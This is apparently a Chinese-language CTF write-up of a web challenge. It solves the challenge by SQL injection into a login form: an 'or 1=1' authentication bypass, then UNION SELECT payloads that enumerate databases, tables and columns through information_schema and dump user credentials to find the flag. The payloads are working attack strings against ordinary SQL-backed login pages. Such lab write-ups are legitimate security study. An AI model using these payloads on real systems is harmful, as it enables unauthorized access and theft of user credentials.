我们先尝试输入,看看是什么效果
1' or 1=1 #
我们好像得到了账户和密码,但是当我输入以后依然是这个界面
密码我也暂时翻译不出来,那就继续注入的思路
尝试之后发现一共有三列
使用联合查询,发现在2,3的位置有回显
查库
admin ' union select 1,2,database() #
查表
admin' union select 1,2,table_name from information_schema.tables where table_schema='geek' #
查字段
admin' union select 1,2,column_name from information_schema.columns where table_name='geekuser' #
使用limit 0,1 获得三列
但是我想看看列里面的东西时,却做不到了?????
admin' union select 1,2,concat_ws(0x7e,'id','username','password') from geek.geekuser limit 0,1#
只能看见第一列,表里面没有内容??
结果发现表好像用错了!!!
再从这个表里看一看字段
好的!找到了flag,就在这个的最后
总结,查库的时候疏忽了,没有查完,可以用group_concat()函数,直接查询所有
这道题就是简单的查库查表查列查字段的应用,基础牢固就可以啦